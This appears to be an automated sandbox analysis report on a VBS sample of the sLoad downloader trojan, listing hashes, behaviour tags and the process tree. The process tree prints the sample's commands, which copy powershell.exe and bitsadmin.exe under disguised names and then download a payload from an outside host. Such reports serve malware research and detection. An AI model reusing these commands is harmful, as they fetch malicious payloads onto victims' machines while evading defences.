sload | 96bd66aedb565c6d29e60d7e7880047749abcd1cfa2d7b27f612b7b32038ede5

Analysis

Target

Allegato_doc_07501560150.vbs
Size

4KB
MD5

e307bc020a581429ed10ee79a4db315c
SHA1

bdcd95f51bda66a11d0147f932f01245f715c1b9
SHA256

96bd66aedb565c6d29e60d7e7880047749abcd1cfa2d7b27f612b7b32038ede5
SHA512

79f815e81d3c70f097a001ba9f331f1ff8a8d82ae425348c994af777fa610cb28c4ce364c80e744177f051f860799f6716e25ca93dba573cc2bfb3c7116b2dde

Score

10^/10

sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload
Executes dropped EXE 1 IoCs

Processes:

NOXGAdE.exe

pid process

2308 NOXGAdE.exe

pid	process
2308	NOXGAdE.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 3776 wrote to memory of 1208	3776	WScript.exe	cmd.exe
PID 3776 wrote to memory of 1208	3776	WScript.exe	cmd.exe
PID 3776 wrote to memory of 1672	3776	WScript.exe	cmd.exe
PID 3776 wrote to memory of 1672	3776	WScript.exe	cmd.exe
PID 3776 wrote to memory of 2308	3776	WScript.exe	NOXGAdE.exe
PID 3776 wrote to memory of 2308	3776	WScript.exe	NOXGAdE.exe
PID 3776 wrote to memory of 2308	3776	WScript.exe	NOXGAdE.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_07501560150.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3776
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zNOXGAdE.exe
  2⤵
  PID:1208
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\NOXGAdE.exe
  2⤵
  PID:1672
- C:\Users\Admin\AppData\Roaming\NOXGAdE.exe
  "C:\Users\Admin\AppData\Roaming\NOXGAdE.exe" /transfer tycgYf /download https://sapphireloading.com/sal/07501560150/maps.jpg C:\Users\Admin\AppData\Roaming\maps.jpg
  2⤵
  - Executes dropped EXE
  PID:2308